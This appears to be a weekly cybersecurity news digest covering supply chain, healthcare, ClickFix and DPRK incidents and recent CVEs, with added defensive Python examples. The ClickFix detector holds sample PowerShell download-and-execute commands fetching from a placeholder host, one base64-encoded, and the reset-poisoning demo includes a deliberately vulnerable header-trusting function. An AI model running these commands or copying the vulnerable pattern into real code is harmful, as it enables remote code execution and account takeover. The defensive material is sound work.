This Week in Cybersecurity
The week of March 11 delivered one of the most technically alarming stories of the quarter: threat actor UNC6426 exploited a dormant npm supply chain compromise in the Nx monorepo toolkit to achieve full AWS administrator access — in just 72 hours — demonstrating that software supply chain risks have very long tails. The attack required no novel vulnerability; it was a patient, pre-staged operation waiting for the right target to pull a poisoned package.
Healthcare continues to be a prime target. Cognizant's TriZetto healthcare software platform exposed sensitive records for 3.4 million patients, while the ransomware ecosystem remains relentless: Velvet Tempest chained ClickFix social engineering lures with a new CastleRAT backdoor to bypass conventional defenses in targeted breaches. And North Korea's crypto-targeting unit UNC4899 delivered a trojanized file to a crypto firm employee via the Apple AirDrop protocol — a strikingly low-tech delivery for a nation-state actor, but effective precisely because it bypasses email and web filters entirely.
Top Stories
UNC6426 Chains Old nx npm Supply Chain Flaw to Full AWS Admin in 72 Hours
Threat actor UNC6426 exploited a previously disclosed but unmitigated supply chain compromise in the Nx monorepo build toolkit — a package with hundreds of thousands of weekly downloads — to achieve full AWS administrator access at a targeted organization. The escalation path ran from compromised CI/CD package → cloud metadata service abuse → IAM privilege escalation → full admin control, all within 72 hours of initial access. The attack underscores that supply chain backdoors do not expire: the malicious code had been dormant in the ecosystem for months before being weaponized against a specific target. The practical consequence is that removing the poisoned package is not remediation on its own: any credential reachable from a CI runner that executed it (cloud keys, tokens, signing material) should be assumed harvested and rotated, and instance-role credential use should be reviewed for activity originating outside the organization's own infrastructure.
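The escalation chain above (instance credentials pulled from the metadata service, then IAM calls that grant administrator rights) leaves a recognisable trail in CloudTrail. The following detection is an added example written for this summary, not code from the report or from any of the vendors named; the CloudTrail records are constructed, and the TRUSTED_EGRESS ranges, the indicator names and the choice of escalation APIs are this example's own assumptions. It relies on the real `sessionContext.ec2RoleDelivery` field, which CloudTrail sets to "1.0" or "2.0" when a session's credentials came from IMDSv1 or IMDSv2.

```python
"""Flag instance-role credential abuse and IAM privilege escalation in CloudTrail records.

Added example, not from the original report. Records below are constructed.
"""
import ipaddress
import json

# IAM API calls that recur in privilege-escalation chains.
ESCALATION_APIS = {
    "AttachUserPolicy", "AttachRolePolicy", "AttachGroupPolicy",
    "PutUserPolicy", "PutRolePolicy", "PutGroupPolicy",
    "CreatePolicyVersion", "SetDefaultPolicyVersion", "UpdateAssumeRolePolicy",
    "CreateAccessKey", "CreateLoginProfile", "UpdateLoginProfile", "AddUserToGroup",
}
ADMIN_POLICY = "arn:aws:iam::aws:policy/AdministratorAccess"

# Assumption: the organization's own egress ranges (hypothetical values).
TRUSTED_EGRESS = [ipaddress.ip_network("10.0.0.0/8"), ipaddress.ip_network("203.0.113.0/24")]


def _offsite(source):
    """True for an IP outside TRUSTED_EGRESS. Non-IP sources (AWS service
    principals such as ec2.amazonaws.com) are not treated as off-site."""
    try:
        ip = ipaddress.ip_address(source)
    except ValueError:
        return False
    return not any(ip in net for net in TRUSTED_EGRESS)


def findings_for(event):
    """Return a list of (rule, detail) tuples for one CloudTrail record."""
    out = []
    ident = event.get("userIdentity", {})
    # ec2RoleDelivery is present when the session credentials came from the
    # instance metadata service: "1.0" for IMDSv1, "2.0" for IMDSv2.
    delivery = ident.get("sessionContext", {}).get("ec2RoleDelivery")
    name = event.get("eventName", "")
    params = event.get("requestParameters") or {}
    source = event.get("sourceIPAddress", "")

    if delivery == "1.0":
        out.append(("imdsv1-credentials", "instance role credentials fetched via IMDSv1"))
    if delivery is not None and _offsite(source):
        out.append(("instance-credentials-offsite", f"instance role used from {source}"))
    if event.get("eventSource") == "iam.amazonaws.com" and name in ESCALATION_APIS:
        severity = "critical" if params.get("policyArn") == ADMIN_POLICY else "high"
        out.append((f"iam-escalation-{severity}", f"{name} by {ident.get('arn', '?')}"))
    return out


def scan(records):
    """Flatten findings over many records as (eventID, rule, detail)."""
    return [(r.get("eventID"), rule, detail)
            for r in records for rule, detail in findings_for(r)]


def _instance_role(delivery):
    return {
        "type": "AssumedRole",
        "arn": "arn:aws:sts::123456789012:assumed-role/ci-runner-role/i-0abc123def456",
        "sessionContext": {"ec2RoleDelivery": delivery},
    }


# Constructed records: the first two model stolen instance credentials replayed from
# outside the VPC; the third is normal in-VPC activity and should produce nothing.
SAMPLE_RECORDS = [
    {"eventID": "e1", "eventSource": "sts.amazonaws.com", "eventName": "GetCallerIdentity",
     "sourceIPAddress": "198.51.100.7", "userIdentity": _instance_role("1.0")},
    {"eventID": "e2", "eventSource": "iam.amazonaws.com", "eventName": "AttachRolePolicy",
     "sourceIPAddress": "198.51.100.7", "userIdentity": _instance_role("1.0"),
     "requestParameters": {"roleName": "ci-runner-role", "policyArn": ADMIN_POLICY}},
    {"eventID": "e3", "eventSource": "ec2.amazonaws.com", "eventName": "DescribeInstances",
     "sourceIPAddress": "10.0.1.5", "userIdentity": _instance_role("2.0")},
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_RECORDS):
        print(json.dumps(finding))
```

The off-site check is the one that matters most for the Nx scenario: a runner's instance role doing work from inside the VPC is normal, while the same role calling STS or IAM from an address the organization does not own means the credentials left the runner. Enforcing IMDSv2 on the runners removes the "1.0" finding class entirely.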
Cognizant TriZetto Breach Exposes 3.4 Million Patient Records
Cognizant's TriZetto healthcare software platform — used by hundreds of US health insurers, TPAs, and benefits administrators — suffered a data breach that exposed health data for 3.4 million patients. Compromised records include names, Social Security numbers, dates of birth, member IDs, and clinical information. The breach illustrates the cascading blast radius of healthcare SaaS compromises: a single vendor incident propagates across every client's member population simultaneously.
ShinyHunters Claims Mass Data Theft From 400 Firms via Salesforce Aura Misconfiguration
Prolific threat actor ShinyHunters claimed responsibility for mass data theft from over 400 organizations by exploiting a Salesforce Aura component misconfiguration that exposed unauthenticated Lightning API endpoints. The group alleges that organizations had deployed Aura components with guest-user access enabled, permitting bulk extraction of customer PII without triggering standard DLP or SIEM controls. This follows the group's prior high-profile breaches of Ticketmaster, Santander, and AT&T, and reinforces that SaaS misconfiguration has become a primary attack vector at scale.
Velvet Tempest Chains ClickFix With CastleRAT in Targeted Breaches
Velvet Tempest, an operator of Termite ransomware, was observed deploying a two-stage attack chain: ClickFix social engineering lures present users with fake browser error or verification dialogs instructing them to paste a PowerShell command that "fixes" the issue, which instead deploys CastleRAT, a custom backdoor with full remote access, keylogging, screenshot capture, and lateral movement capabilities. Because the lure carries no malicious attachment or link and the victim runs the command themselves, email security gateways and download controls have nothing to inspect. Organizations should enable PowerShell script block logging and alert on user-initiated PowerShell with hidden-window, download-cradle or encoded-command arguments, and consider restricting the Run dialog and interactive PowerShell for standard users. Auditing execution policies is worthwhile but not sufficient on its own: execution policy is not a security boundary, and ClickFix commands routinely override it with -ExecutionPolicy Bypass.
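Script block logging (Event ID 4104) records the text a pasted ClickFix command executes, including the payload hidden behind -EncodedCommand. The triage logic below is an added example written for this summary, not tooling from the report or from any vendor; the sample script blocks are constructed, and the indicator weights and threshold are this example's own assumption. It generalises beyond the CastleRAT lure to the common ClickFix traits: a hidden window, an execution-policy bypass, a download cradle piped to Invoke-Expression, and the reassuring "I am not a robot" comment appended so the Run box looks harmless.

```python
"""Score PowerShell script-block log text (Event ID 4104 ScriptBlockText) for ClickFix traits.

Added example, not from the original report. Samples are constructed; weights and
the threshold are this example's own assumption.
"""
import base64
import re

INDICATORS = [
    ("hidden-window", 2, re.compile(r"-w(?:indowstyle)?\s+hidden", re.I)),
    ("execpolicy-bypass", 2, re.compile(r"-e(?:xecutionpolicy|p)\s+bypass", re.I)),
    ("download-cradle", 3, re.compile(
        r"\b(iwr|irm|invoke-webrequest|invoke-restmethod|downloadstring|net\.webclient|curl|wget)\b",
        re.I)),
    ("invoke-expression", 3, re.compile(r"\b(iex|invoke-expression)\b", re.I)),
    ("mshta", 3, re.compile(r"\bmshta(?:\.exe)?\b", re.I)),
    # ClickFix pastes commonly end with a comment so the Run box shows a reassuring message.
    ("captcha-lure-comment", 4, re.compile(r"#.*(not a robot|verification|captcha)", re.I)),
]
# -e / -ec / -enc / -EncodedCommand followed by a base64 blob.
ENCODED_RE = re.compile(r"-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})", re.I)
THRESHOLD = 6


def decode_encoded_command(text):
    """Return the UTF-16LE payload of an -EncodedCommand argument, or None."""
    m = ENCODED_RE.search(text)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def score(script_text):
    """Score one script block; the decoded payload is inspected alongside the wrapper."""
    hits, total = [], 0
    decoded = decode_encoded_command(script_text)
    haystack = script_text
    if decoded is not None:
        hits.append("encoded-command")
        total += 2
        haystack += "\n" + decoded
    for name, weight, rx in INDICATORS:
        if rx.search(haystack):
            hits.append(name)
            total += weight
    return {"score": total, "indicators": hits, "decoded": decoded,
            "verdict": "clickfix-likely" if total >= THRESHOLD else "benign"}


# Constructed samples. The encoded variant is built here so the base64 is genuine.
_INNER = "IEX (New-Object Net.WebClient).DownloadString('https://example.invalid/stage2')"
_ENCODED = base64.b64encode(_INNER.encode("utf-16-le")).decode()
SAMPLES = {
    "clickfix-plain": 'powershell -w hidden -ep bypass -c "iwr -useb https://example.invalid/v | iex" '
                      '# I am not a robot - reCAPTCHA Verification ID: 8123',
    "clickfix-encoded": f"powershell -nop -w hidden -enc {_ENCODED}",
    "admin-cleanup": r"Get-ChildItem C:\Logs -Filter *.log | Where-Object { $_.Length -gt 1MB } | Remove-Item",
    "legit-download": "Invoke-WebRequest -Uri https://intranet.example/config.json -OutFile config.json",
}

if __name__ == "__main__":
    for label, text in SAMPLES.items():
        result = score(text)
        print(f"{label:18} {result['verdict']:16} score={result['score']:2} {result['indicators']}")
```

A single download cradle (the "legit-download" sample) stays below the threshold on purpose; it is the combination of a hidden window, a bypass and a cradle piped into Invoke-Expression, usually with the lure comment still attached, that distinguishes a pasted ClickFix command from routine administration.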
North Korea's UNC4899 Breached Crypto Firm via AirDropped Trojanized File
UNC4899, a DPRK-nexus unit focused on cryptocurrency targets, compromised a cryptocurrency firm by AirDropping a trojanized file directly to an employee's corporate MacBook, a delivery path that entirely circumvents email filtering, web proxies, and endpoint download controls. The file appeared as a legitimate business document; once opened, it established persistence via a Launch Agent and exfiltrated wallet credentials and internal keys. Organizations permitting AirDrop on corporate Apple devices should restrict discovery to Contacts Only or disable AirDrop via MDM policy, and should treat unexpected entries in ~/Library/LaunchAgents as a persistence indicator worth alerting on.
More Headlines This Week
- Ericsson US Breach: Ericsson's US subsidiary disclosed unauthorized access to internal systems affecting employees and enterprise service customers, with an active forensic investigation underway.
- Phobos Admin Guilty Plea: Russian national Evgenii Ptitsyn pleaded guilty to operating the Phobos ransomware-as-a-service platform responsible for 1,000+ victims and $39M+ extorted, facing a maximum 20-year sentence.
- Google: 90 Zero-Days Exploited in 2025: Google GTIG confirmed 90 zero-days were actively exploited last year, with enterprise technologies accounting for an all-time high of 48% of them; commercial spyware vendors have now surpassed nation-states as the leading zero-day exploiters.
- Attack Surface Reduction Over Patch Speed: An analysis published this week argues that the reactive zero-day scramble is avoidable, and that organizations with reduced attack surfaces consistently outperform those focused solely on patch velocity.
- Spanish-Ukrainian Gambling Ring Bust: Police dismantled a criminal network exploiting Ukrainian war refugees to launder nearly €4.75M through online gambling platforms, with 12 arrests across Spain and Ukraine.
Security Advisories This Week
14 new CVEs added to the Security Advisories section this week — four rated Critical, ten rated High. Notable advisories below.
CVE-2025-11158 — Hitachi Vantara Pentaho RCE via Unrestricted Groovy Scripts (CVSS Critical) Unauthenticated attackers can submit arbitrary Groovy scripts to the Pentaho Business Analytics platform, achieving full remote code execution on the server. Any organization running Pentaho on an exposed network should treat this as an emergency patch.
CVE-2026-0953 — Tutor LMS Pro Auth Bypass — 30,000+ WordPress Sites at Risk (CVSS Critical) A broken authentication flaw in the Tutor LMS Pro WordPress plugin allows unauthenticated attackers to assume any user role including site administrator. With 30,000+ active installs, mass exploitation tooling is expected. Update immediately.
CVE-2026-29191 — ZITADEL SAML XSS Enables 1-Click Account Takeover (CVSS Critical) A reflected XSS in ZITADEL's SAML authentication endpoint allows attackers to craft a malicious URL that, when clicked by any authenticated user, hijacks their session — including administrators. Part of a three-CVE ZITADEL cluster disclosed this week.
CVE-2026-3630 — Delta Electronics COMMGR2 Stack Buffer Overflow (CVSS Critical) A stack-based buffer overflow in Delta Electronics' COMMGR2 industrial communication software allows unauthenticated remote code execution. COMMGR2 is widely deployed in manufacturing and critical infrastructure OT/ICS environments — patch or isolate immediately.
Also this week — High severity:
- CVE-2026-29067 — ZITADEL password reset link poisoned by Forwarded header injection, enabling full account takeover without valid credentials
- CVE-2026-29192 — ZITADEL stored XSS via default redirect URI in OAuth clients, enabling admin-assisted account takeover
- CVE-2026-3589 — WooCommerce CSRF flaw allows unauthenticated creation of admin accounts on any affected store
- CVE-2026-3038 — FreeBSD kernel stack buffer overflow in rtsock_msg_buffer() with local privilege escalation potential
- CVE-2018-25165 — SQL injection in Galaxy Forces MMORPG
- CVE-2018-25169 — Denial of service in AMPPS 2.7
- CVE-2026-3730, CVE-2026-3740, CVE-2026-3746 — SQL injection cluster in SourceCodester web apps
- CVE-2026-3734 — Improper authorization in SourceCodester Client Database Management System
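The CVE-2026-29067 item above describes a password reset link poisoned through a Forwarded header: an application that derives the link's origin from request headers will mail the victim a link pointing at whatever host the attacker named, and the reset token is delivered to the attacker when the victim clicks. The following added example illustrates that vulnerability class beside the hardened form; it is not ZITADEL's code and does not reproduce ZITADEL's actual fix, and the hostnames, CANONICAL_ORIGIN and ALLOWED_HOSTS values are assumptions.

```python
"""Password-reset link construction: Forwarded/X-Forwarded-Host poisoning vs. a fixed origin.

Added example illustrating the vulnerability class behind CVE-2026-29067; it is not
ZITADEL's code and does not reproduce its actual fix. Hostnames are hypothetical.
"""
import secrets

CANONICAL_ORIGIN = "https://auth.example.com"             # assumption: taken from deployment config
ALLOWED_HOSTS = {"auth.example.com", "login.example.com"}  # assumption: hosts the proxy may present


def parse_forwarded(value):
    """Parse the first element of an RFC 7239 Forwarded header into a dict."""
    first = value.split(",", 1)[0]
    fields = {}
    for pair in first.split(";"):
        if "=" in pair:
            key, val = pair.split("=", 1)
            fields[key.strip().lower()] = val.strip().strip('"')
    return fields


def observed_origin(headers):
    """Origin as a proxy-aware app naively reconstructs it, trusting Forwarded and
    X-Forwarded-* ahead of Host. All of these are client-supplied unless the
    reverse proxy overwrites them."""
    h = {k.lower(): v for k, v in headers.items()}
    fwd = parse_forwarded(h.get("forwarded", ""))
    host = fwd.get("host") or h.get("x-forwarded-host") or h.get("host", "")
    proto = fwd.get("proto") or h.get("x-forwarded-proto") or "https"
    return f"{proto}://{host}"


def reset_link_vulnerable(headers, token):
    """Vulnerable pattern: the link is built from request headers, so the token is
    sent to whatever host the requester named."""
    return f"{observed_origin(headers)}/reset?token={token}"


def reset_link_hardened(headers, token):
    """Hardened pattern: the link is built from configuration only. The header-derived
    host is still compared against the allowlist so a mismatch can be logged or the
    request rejected upstream. Returns (link, suspicious)."""
    host = observed_origin(headers).split("://", 1)[1].split(":", 1)[0].lower()
    return f"{CANONICAL_ORIGIN}/reset?token={token}", host not in ALLOWED_HOSTS


# Constructed requests: an attacker-initiated reset carrying a poisoned Forwarded
# header, and a legitimate request as a reverse proxy would present it.
POISONED = {"Host": "auth.example.com",
            "Forwarded": 'for=192.0.2.60;proto=https;host="attacker.example"'}
LEGIT = {"Host": "10.0.0.5:8080", "X-Forwarded-Host": "auth.example.com",
         "X-Forwarded-Proto": "https"}

if __name__ == "__main__":
    token = secrets.token_urlsafe(32)
    print("vulnerable:", reset_link_vulnerable(POISONED, token))
    print("hardened:  ", reset_link_hardened(POISONED, token))
```

The same defect appears with the plain Host header whenever the server accepts any host, which is why the hardened builder ignores the request entirely rather than trying to sanitise it; the allowlist comparison exists only to surface tampering attempts for the SOC.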
By the Numbers
| Metric | Value |
|---|---|
| Healthcare patients exposed (TriZetto) | 3.4 million |
| Firms targeted in Salesforce Aura campaign | 400+ |
| AWS admin access achieved in | 72 hours |
| Phobos ransomware victims worldwide | 1,000+ |
| Total extorted by Phobos RaaS | $39M+ |
| ZITADEL CVEs disclosed this week | 3 |
| Critical CVEs published this week | 4 |
| Total CVEs published this week | 14 |
| Zero-days exploited in 2025 (Google) | 90 (48% enterprise) |
CosmicBytez Labs — IT & Cybersecurity Intelligence Hub